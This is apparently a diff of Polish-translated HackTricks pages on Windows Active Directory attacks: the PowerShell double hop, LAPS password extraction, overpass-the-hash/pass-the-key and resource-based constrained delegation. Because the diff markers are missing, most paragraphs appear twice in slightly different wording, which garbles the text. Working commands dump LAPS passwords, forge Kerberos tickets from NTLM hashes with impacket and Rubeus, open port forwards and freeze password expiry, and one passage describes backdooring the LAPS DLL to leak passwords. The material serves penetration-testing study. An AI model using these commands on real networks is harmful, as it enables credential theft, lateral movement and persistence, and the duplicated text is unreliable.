Innym sposobem uniknięcia tego problemu, który jest [**zauważalnie niebezpieczny**](https://docs.microsoft.com/en-us/powershell/module/microsoft.wsman.management/enable-wsmancredssp?view=powershell-7), jest **Dostawca Obsługi Bezpieczeństwa Poświadczeń**. Według Microsoftu:
> Uwierzytelnianie CredSSP deleguje poświadczenia użytkownika z komputera lokalnego do zdalnego komputera. Ta praktyka zwiększa ryzyko bezpieczeństwa operacji zdalnych. Jeśli zdalny komputer zostanie skompromitowany, gdy poświadczenia zostaną do niego przekazane, poświadczenia mogą być użyte do kontrolowania sesji sieciowej.
> Uwierzytelnianie CredSSP przekazuje poświadczenia użytkownika z komputera lokalnego do zdalnego komputera. Ta praktyka zwiększa ryzyko bezpieczeństwa operacji zdalnych. Jeśli zdalny komputer zostanie skompromitowany, gdy poświadczenia zostaną do niego przekazane, poświadczenia mogą być użyte do kontrolowania sesji sieciowej.
Zaleca się wyłączenie **CredSSP** na systemach produkcyjnych, wrażliwych sieciach i podobnych środowiskach ze względów bezpieczeństwa. Aby sprawdzić, czy **CredSSP** jest włączone, można użyć polecenia `Get-WSManCredSSP`. Polecenie to pozwala na **sprawdzenie statusu CredSSP** i może być nawet wykonane zdalnie, o ile jest włączone **WinRM**.
Zaleca się wyłączenie **CredSSP** na systemach produkcyjnych, wrażliwych sieciach i podobnych środowiskach ze względów bezpieczeństwa. Aby sprawdzić, czy **CredSSP** jest włączone, można uruchomić polecenie `Get-WSManCredSSP`. Polecenie to pozwala na **sprawdzenie stanu CredSSP** i może być nawet wykonane zdalnie, o ile jest włączone **WinRM**.
```powershell
Invoke-Command -ComputerName bizintel -Credential ta\redsuit -ScriptBlock {
Get-WSManCredSSP
}
```
## Rozwiązania tymczasowe
## Metody obejścia
### Wywołanie polecenia
Aby rozwiązać problem podwójnego skoku, przedstawiona jest metoda wykorzystująca zagnieżdżone polecenie `Invoke-Command`. Nie rozwiązuje to problemu bezpośrednio, ale oferuje obejście bez konieczności stosowania specjalnych konfiguracji. Ten sposób pozwala na wykonanie polecenia (`hostname`) na drugim serwerze za pomocą polecenia PowerShell wykonanego z początkowego atakującego komputera lub poprzez wcześniej ustanowioną sesję PS z pierwszym serwerem. Oto jak to się robi:
Aby rozwiązać problem podwójnego skoku, przedstawiona jest metoda wykorzystująca zagnieżdżone polecenie `Invoke-Command`. Nie rozwiązuje to problemu bezpośrednio, ale oferuje obejście bez konieczności stosowania specjalnych konfiguracji. Podejście to pozwala na wykonanie polecenia (`hostname`) na drugim serwerze za pomocą polecenia PowerShell wykonanego z początkowego atakującego komputera lub poprzez wcześniej ustanowioną sesję PS-Session z pierwszym serwerem. Oto jak to się robi:
```powershell
$cred = Get-Credential ta\redsuit
Invoke-Command -ComputerName bizintel -Credential $cred -ScriptBlock {
Invoke-Command -ComputerName secdev -Credential $cred -ScriptBlock {hostname}
}
```
Alternatywnie, zaleca się ustanowienie sesji PS z pierwszym serwerem i uruchomienie `Invoke-Command` za pomocą `$cred` w celu scentralizowania zadań.
Alternatywnie, ustanowienie sesji PS z pierwszym serwerem i uruchomienie polecenia `Invoke-Command` przy użyciu `$cred` jest sugerowane do scentralizowania zadań.
### Zarejestruj konfigurację sesji PS
@ -70,24 +70,24 @@ klist
```
### Przekierowywanie portów
Dla lokalnych administratorów na pośrednim celu, przekierowywanie portów pozwala na przesyłanie żądań do ostatecznego serwera. Korzystając z `netsh`, można dodać regułę przekierowania portu, obok reguły zapory systemu Windows, aby zezwolić na przekierowany port.
Dla administratorów lokalnych na docelowym pośrednim serwerze, przekierowywanie portów pozwala na przesyłanie żądań do ostatecznego serwera. Korzystając z `netsh`, można dodać regułę przekierowywania portów, wraz z regułą zapory systemu Windows, aby zezwolić na przekierowany port.
```bash
netsh interface portproxy add v4tov4 listenport=5446 listenaddress=10.35.8.17 connectport=5985 connectaddress=10.35.8.23
netsh advfirewall firewall add rule name=fwd dir=in action=allow protocol=TCP localport=5446
```
#### winrs.exe
`winrs.exe` może być używany do przekazywania żądań WinRM, potencjalnie jako opcja mniej wykrywalna, jeśli obawiasz się monitorowania PowerShell. Poniższe polecenie demonstruje jego użycie:
`winrs.exe` może być używany do przekazywania żądań WinRM, potencjalnie jako mniej wykrywalna opcja, jeśli obawiasz się monitorowania PowerShell. Poniższe polecenie demonstruje jego użycie:
```bash
winrs -r:http://bizintel:5446 -u:ta\redsuit -p:2600leet hostname
```
### OpenSSH
Instalowanie OpenSSH na pierwszym serwerze umożliwia obejście problemu podwójnego skoku, szczególnie przydatne w scenariuszach z użyciem skrzynki skokowej. Ta metoda wymaga instalacji wiersza poleceń i konfiguracji OpenSSH dla systemu Windows. Po skonfigurowaniu uwierzytelniania hasłem, pośredni serwer może uzyskać TGT w imieniu użytkownika.
Instalowanie OpenSSH na pierwszym serwerze umożliwia obejście problemu podwójnego skoku, szczególnie przydatne w scenariuszach skrzynki skokowej. Ta metoda wymaga instalacji wiersza poleceń i konfiguracji OpenSSH dla systemu Windows. Po skonfigurowaniu uwierzytelniania hasłem, pozwala to serwerowi pośredniemu na uzyskanie TGT w imieniu użytkownika.
#### Kroki instalacji OpenSSH
1. Pobierz i przenieś najnowszy plik zip z wydaniem OpenSSH na docelowy serwer.
1. Pobierz i przenieś najnowszy plik zip z wydaniem OpenSSH na serwer docelowy.
2. Rozpakuj i uruchom skrypt `Install-sshd.ps1`.
3. Dodaj regułę zapory sieciowej, aby otworzyć port 22 i sprawdź, czy usługi SSH są uruchomione.
@ -102,7 +102,7 @@ icacls.exe "C:\Users\redsuit\Documents\ssh\OpenSSH-Win64" /grant Everyone:RX /T
* [https://learn.microsoft.com/en-gb/archive/blogs/sergey\_babkins\_blog/another-solution-to-multi-hop-powershell-remoting](https://learn.microsoft.com/en-gb/archive/blogs/sergey\_babkins\_blog/another-solution-to-multi-hop-powershell-remoting)
* [https://4sysops.com/archives/solve-the-powershell-multi-hop-problem-without-using-credssp/](https://4sysops.com/archives/solve-the-powershell-multi-hop-problem-without-using-credssp/)
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -113,7 +113,7 @@ icacls.exe "C:\Users\redsuit\Documents\ssh\OpenSSH-Win64" /grant Everyone:RX /T
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć swoją **firmę reklamowaną w HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegram**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**repozytorium hacktricks**](https://github.com/carlospolop/hacktricks) **i** [**repozytorium hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

30
windows-hardening/active-directory-methodology/laps.md
View file

@ -12,16 +12,16 @@
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
## Podstawowe informacje
Local Administrator Password Solution (LAPS) to narzędzie używane do zarządzania systemem, w którym **hasła administratora**, które są **unikalne, losowe i często zmieniane**, są stosowane do komputerów dołączonych do domeny. Te hasła są przechowywane bezpiecznie w Active Directory i są dostępne tylko dla użytkowników, którzy otrzymali uprawnienia poprzez listy kontroli dostępu (ACL). Bezpieczeństwo transmisji hasła z klienta do serwera jest zapewnione przez użycie **Kerberos w wersji 5** i **zaawansowanego standardu szyfrowania (AES)**.
Local Administrator Password Solution (LAPS) to narzędzie używane do zarządzania systemem, w którym **hasła administratora**, które są **unikalne, losowe i często zmieniane**, są stosowane do komputerów dołączonych do domeny. Te hasła są przechowywane bezpiecznie w Active Directory i są dostępne tylko dla użytkowników, którzy otrzymali uprawnienia poprzez listy kontroli dostępu (ACL). Bezpieczeństwo transmisji hasła z klienta do serwera jest zapewnione przez użycie **Kerberos w wersji 5** i **Advanced Encryption Standard (AES)**.
W obiektach komputerów domeny, wdrożenie LAPS skutkuje dodaniem dwóch nowych atrybutów: **`ms-mcs-AdmPwd`** i **`ms-mcs-AdmPwdExpirationTime`**. Te atrybuty przechowują odpowiednio **hasło administratora w postaci tekstu jawnego** i **jego czas wygaśnięcia**.
W obiektach komputerów domeny, wdrożenie LAPS skutkuje dodaniem dwóch nowych atrybutów: **`ms-mcs-AdmPwd`** i **`ms-mcs-AdmPwdExpirationTime`**. Te atrybuty przechowują odpowiednio **hasło administratora w postaci zwykłego tekstu** i **jego czas wygaśnięcia**.
### Sprawdź, czy jest aktywowany
```bash
@ -38,9 +38,9 @@ Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs
```
### Dostęp do hasła LAPS
Możesz **pobrać surową politykę LAPS** z `\\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol`, a następnie użyć **`Parse-PolFile`** z pakietu [**GPRegistryPolicyParser**](https://github.com/PowerShell/GPRegistryPolicyParser) do przekształcenia tego pliku w czytelną formę dla człowieka.
Możesz **pobrać surową politykę LAPS** z `\\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol`, a następnie użyć **`Parse-PolFile`** z pakietu [**GPRegistryPolicyParser**](https://github.com/PowerShell/GPRegistryPolicyParser), aby przekonwertować ten plik na czytelną dla człowieka formę.
Co więcej, **wbudowane polecenia PowerShell LAPS** mogą być używane, jeśli są zainstalowane na maszynie, do której mamy dostęp:
Co więcej, **wbudowane polecenia PowerShell LAPS** mogą być użyte, jeśli są zainstalowane na maszynie, do której mamy dostęp:
```powershell
Get-Command *AdmPwd*
@ -71,9 +71,9 @@ Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd
```
### LAPSToolkit
Narzędzie [LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) ułatwia wyliczanie LAPS za pomocą kilku funkcji.\
Jedną z nich jest analiza **`ExtendedRights`** dla **wszystkich komputerów z włączonym LAPS.** To pokaże **grupy**, które są specjalnie **upoważnione do odczytywania haseł LAPS**, które często są użytkownikami w chronionych grupach.\
Konto, które dołączyło komputer do domeny, otrzymuje `All Extended Rights` nad tym hostem, a to prawo daje temu **kontu** możliwość **odczytywania haseł**. Wyliczenie może pokazać konto użytkownika, które może odczytać hasło LAPS na hoście. To może pomóc nam **w celowaniu w konkretne użytkowników AD**, którzy mogą odczytywać hasła LAPS.
[LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) ułatwia wyliczanie LAPS za pomocą kilku funkcji.\
Jedną z nich jest analiza **`ExtendedRights`** dla **wszystkich komputerów z włączonym LAPS.** To pokaże **grupy** specjalnie **upoważnione do odczytu haseł LAPS**, które często są użytkownikami w chronionych grupach.\
**Konto**, które dołączyło komputer do domeny, otrzymuje `All Extended Rights` nad tym hostem, a to prawo daje temu **kontu** możliwość **odczytu haseł**. Wyliczenie może pokazać konto użytkownika, które może odczytać hasło LAPS na hoście. To może pomóc nam **w docelowym wyborze konkretnych użytkowników AD**, którzy mogą odczytać hasła LAPS.
```powershell
# Get groups that can read passwords
Find-LAPSDelegatedGroups
@ -98,7 +98,7 @@ ComputerName Password Expiration
DC01.DOMAIN_NAME.LOCAL j&gR+A(s976Rf% 12/10/2022 13:24:41
```
## **Wyciek hasła LAPS za pomocą Crackmapexec**
Jeśli nie ma dostępu do powershella, można nadużyć tego uprawnienia zdalnie za pomocą LDAP, korzystając z
Jeśli nie ma dostępu do powershell, można nadużyć tego uprawnienia zdalnie za pomocą LDAP, korzystając z
```
crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
```
@ -106,7 +106,7 @@ crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
### **Data wygaśnięcia**
Gdy już masz uprawnienia administratora, możesz **uzyskać hasła** i **zapobiec** aktualizacji **hasła maszyny**, ustawiając datę wygaśnięcia w przyszłości.
Gdy już masz uprawnienia administratora, możesz **uzyskać hasła** i **zapobiec** aktualizacji **hasła** na maszynie, **ustawiając datę wygaśnięcia w przyszłości**.
```powershell
# Get expiration time
Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime
@ -116,19 +116,19 @@ Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime
Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}
```
{% hint style="warning" %}
Hasło zostanie nadal zresetowane, jeśli **administrator** użyje polecenia **`Reset-AdmPwdPassword`**; lub jeśli opcja **Nie zezwalaj na dłuższy czas ważności hasła niż wymaga tego zasada** jest włączona w GPO LAPS.
Hasło zostanie nadal zresetowane, jeśli **administrator** użyje polecenia **`Reset-AdmPwdPassword`**; lub jeśli opcja **Nie zezwalaj na dłuższy czas ważności hasła niż wymaga tego zasady** jest włączona w GPO LAPS.
{% endhint %}
### Tylnie drzwi
Oryginalny kod źródłowy LAPS można znaleźć [tutaj](https://github.com/GreyCorbel/admpwd), dlatego istnieje możliwość umieszczenia tylnich drzwi w kodzie (wewnątrz metody `Get-AdmPwdPassword` w `Main/AdmPwd.PS/Main.cs` na przykład), które w jakiś sposób **wyprowadzą nowe hasła lub przechowają je gdzieś**.
Oryginalny kod źródłowy LAPS można znaleźć [tutaj](https://github.com/GreyCorbel/admpwd), dlatego istnieje możliwość umieszczenia tylnych drzwi w kodzie (wewnątrz metody `Get-AdmPwdPassword` w `Main/AdmPwd.PS/Main.cs` na przykład), które w jakiś sposób **wyprowadzą nowe hasła lub przechowają je gdzieś**.
Następnie wystarczy skompilować nowe `AdmPwd.PS.dll` i przesłać go na maszynę do `C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll` (i zmienić czas modyfikacji).
## Referencje
* [https://4sysops.com/archives/introduction-to-microsoft-laps-local-administrator-password-solution/](https://4sysops.com/archives/introduction-to-microsoft-laps-local-administrator-password-solution/)
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -136,10 +136,10 @@ Następnie wystarczy skompilować nowe `AdmPwd.PS.dll` i przesłać go na maszyn
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Pracujesz w **firmie z branży cyberbezpieczeństwa**? Chcesz zobaczyć, jak Twoja **firma jest reklamowana w HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć swoją **firmę reklamowaną w HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegram**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do [repozytorium hacktricks](https://github.com/carlospolop/hacktricks) i [repozytorium hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
</details>

22
windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
View file

@ -4,7 +4,7 @@
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Czy pracujesz w **firmie z branży cyberbezpieczeństwa**? Chcesz zobaczyć swoją **firmę reklamowaną na HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć, jak Twoja **firma jest reklamowana na HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
@ -12,23 +12,23 @@
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
## Przejście hasła/klucza (PTK)
Atak **Przejście hasła/klucza (PTK)** jest przeznaczony dla środowisk, w których tradycyjny protokół NTLM jest ograniczony, a uwierzytelnianie Kerberos ma pierwszeństwo. Ten atak wykorzystuje skróty NTLM lub klucze AES użytkownika do pozyskania biletów Kerberos, umożliwiając nieautoryzowany dostęp do zasobów w sieci.
Atak **Przejście hasła/klucza (PTK)** jest przeznaczony dla środowisk, w których tradycyjny protokół NTLM jest ograniczony, a uwierzytelnianie Kerberos ma pierwszeństwo. Ten atak wykorzystuje skrót NTLM lub klucze AES użytkownika do pozyskania biletów Kerberos, umożliwiając nieautoryzowany dostęp do zasobów w sieci.
Aby przeprowadzić ten atak, pierwszym krokiem jest pozyskanie skrótu NTLM lub hasła konta docelowego użytkownika. Po uzyskaniu tych informacji można uzyskać Bilet Grantujący Bilet (TGT) dla konta, co pozwala hakerowi uzyskać dostęp do usług lub maszyn, do których użytkownik ma uprawnienia.
Aby przeprowadzić ten atak, początkowym krokiem jest pozyskanie skrótu NTLM lub hasła konta docelowego użytkownika. Po uzyskaniu tych informacji można uzyskać Bilet Grantujący Bilet (TGT) dla konta, co pozwala hakerowi uzyskać dostęp do usług lub maszyn, do których użytkownik ma uprawnienia.
Proces można rozpocząć za pomocą następujących poleceń:
Proces można zainicjować za pomocą następujących poleceń:
```bash
python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
```
W przypadku scenariuszy wymagających AES256 można skorzystać z opcji `-aesKey [klucz AES]`. Ponadto pozyskany bilet może być wykorzystany z różnymi narzędziami, takimi jak smbexec.py lub wmiexec.py, poszerzając zakres ataku.
W przypadkach wymagających AES256 można skorzystać z opcji `-aesKey [klucz AES]`. Ponadto pozyskany bilet może być wykorzystany z różnymi narzędziami, w tym smbexec.py lub wmiexec.py, poszerzając zakres ataku.
Napotkane problemy, takie jak _PyAsn1Error_ lub _KDC cannot find the name_, zazwyczaj są rozwiązywane poprzez zaktualizowanie biblioteki Impacket lub używanie nazwy hosta zamiast adresu IP, zapewniając kompatybilność z Kerberos KDC.
@ -37,9 +37,9 @@ Alternatywna sekwencja poleceń z użyciem Rubeus.exe prezentuje inną stronę t
.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
```
Ta metoda odzwierciedla podejście **Pass the Key**, skupiając się na przejęciu i wykorzystaniu biletu bezpośrednio do celów uwierzytelniania. Ważne jest zauważenie, że inicjacja żądania TGT powoduje zdarzenie `4768: Żądany został bilet uwierzytelniania Kerberos (TGT)`, sygnalizując domyślne użycie RC4-HMAC, chociaż nowoczesne systemy Windows preferują AES256.
Ten sposób odzwierciedla podejście **Przekazanie Klucza**, skupiając się na przejęciu i wykorzystaniu biletu bezpośrednio do celów uwierzytelniania. Ważne jest zauważenie, że inicjacja żądania TGT powoduje zdarzenie `4768: Żądanie biletu uwierzytelniającego Kerberos (TGT)`, sygnalizujące domyślne użycie RC4-HMAC, chociaż nowoczesne systemy Windows preferują AES256.
Aby dostosować się do bezpieczeństwa operacyjnego i używać AES256, można zastosować poniższą komendę:
Aby dostosować się do bezpieczeństwa operacyjnego i używać AES256, można zastosować następujące polecenie:
```bash
.\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec
```
@ -47,7 +47,7 @@ Aby dostosować się do bezpieczeństwa operacyjnego i używać AES256, można z
* [https://www.tarlogic.com/es/blog/como-atacar-kerberos/](https://www.tarlogic.com/es/blog/como-atacar-kerberos/)
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -55,10 +55,10 @@ Aby dostosować się do bezpieczeństwa operacyjnego i używać AES256, można z
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć, jak Twoja **firma jest reklamowana w HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć swoją **firmę reklamowaną w HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegram**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do [repozytorium hacktricks](https://github.com/carlospolop/hacktricks) i [repozytorium hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
</details>

36
windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
View file

@ -14,7 +14,7 @@ Inne sposoby wsparcia HackTricks:
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -22,30 +22,30 @@ Inne sposoby wsparcia HackTricks:
Jest to podobne do podstawowej [Delegacji Ograniczonej](constrained-delegation.md) ale **zamiast** nadawania uprawnień **obiektowi do podszycia się pod dowolnego użytkownika wobec usługi**. Delegacja ograniczona oparta na zasobach **ustawia w obiekcie, kto może podszycić się pod dowolnego użytkownika wobec niego**.
W tym przypadku obiekt z ograniczeniami będzie miał atrybut o nazwie _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ z nazwą użytkownika, który może podszycić się pod dowolnego innego użytkownika wobec niego.
W tym przypadku obiekt ograniczony będzie miał atrybut o nazwie _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ z nazwą użytkownika, który może podszycić się pod dowolnego innego użytkownika wobec niego.
Inną ważną różnicą w tej Delegacji Ograniczonej w porównaniu do innych delegacji jest to, że każdy użytkownik z **uprawnieniami do zapisu nad kontem komputera** (_GenericAll/GenericWrite/WriteDacl/WriteProperty/etc_) może ustawić _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ (w innych formach Delegacji potrzebne były uprawnienia administratora domeny).
### Nowe pojęcia
W przypadku Delegacji Ograniczonej zostało powiedziane, że flaga **`TrustedToAuthForDelegation`** wewnątrz wartości _userAccountControl_ użytkownika jest wymagana do wykonania **S4U2Self**. Ale to nie do końca prawda.\
Rzeczywistość jest taka, że nawet bez tej wartości, możesz wykonać **S4U2Self** wobec dowolnego użytkownika, jeśli jesteś **usługą** (masz SPN), ale jeśli **masz `TrustedToAuthForDelegation`** zwrócony TGS będzie **Forwardable**, a jeśli **nie masz** tej flagi, zwrócony TGS **nie** będzie **Forwardable**.
W przypadku Delegacji Ograniczonej mówiono, że flaga **`TrustedToAuthForDelegation`** wewnątrz wartości _userAccountControl_ użytkownika jest potrzebna do wykonania **S4U2Self**. Ale to nie do końca prawda.\
Rzeczywistość jest taka, że nawet bez tej wartości można wykonać **S4U2Self** wobec dowolnego użytkownika, jeśli jesteś **usługą** (masz SPN), ale jeśli **masz `TrustedToAuthForDelegation`** zwrócony TGS będzie **Forwardable**, a jeśli **nie masz** tej flagi, zwrócony TGS **nie** będzie **Forwardable**.
Jednak jeśli **TGS** używany w **S4U2Proxy** **NIE jest Forwardable**, próba wykorzystania **podstawowej Delegacji Ograniczonej** **nie zadziała**. Ale jeśli próbujesz wykorzystać **delegację ograniczoną opartą na zasobach, zadziała** (to nie jest podatność, to funkcja, najwyraźniej).
### Struktura ataku
> Jeśli masz **uprawnienia równoważne zapisu** nad kontem **Komputera**, możesz uzyskać **uprzywilejowany dostęp** do tego komputera.
> Jeśli masz **uprawnienia równoważne zapisu** nad kontem **komputera**, możesz uzyskać **uprzywilejowany dostęp** do tego komputera.
Załóżmy, że atakujący ma już **uprawnienia równoważne zapisu nad komputerem ofiary**.
1. Atakujący **kompromituje** konto, które ma **SPN** lub **tworzy je** ("Usługa A"). Zauważ, że **dowolny** _Użytkownik Administratora_ bez żadnych innych specjalnych uprawnień może **utworzyć** aż do 10 **obiektów Komputera (**_**MachineAccountQuota**_**)** i nadać im SPN. Więc atakujący może po prostu utworzyć obiekt Komputera i nadać mu SPN.
1. Atakujący **kompromituje** konto, które ma **SPN** lub **tworzy je** ("Usługa A"). Zauważ, że **dowolny** _Użytkownik Admin_ bez żadnych innych specjalnych uprawnień może **utworzyć** aż do 10 **obiektów komputerowych (**_**MachineAccountQuota**_**)** i nadać im SPN. Więc atakujący może po prostu utworzyć obiekt komputera i nadać mu SPN.
2. Atakujący **wykorzystuje swoje uprawnienia DO ZAPISU** nad komputerem ofiary (UsługaB), aby skonfigurować **delegację ograniczoną opartą na zasobach, pozwalającą UsłudzeA na podszycie się pod dowolnego użytkownika** wobec tego komputera ofiary (UsługaB).
3. Atakujący używa narzędzia Rubeus do przeprowadzenia **pełnego ataku S4U** (S4U2Self i S4U2Proxy) z Usługi A na Usługę B dla użytkownika **z uprzywilejowanym dostępem do Usługi B**.
1. S4U2Self (z kompromitowanego/utworzonego konta SPN): Prośba o **TGS Administratora do mnie** (Nie Forwardable).
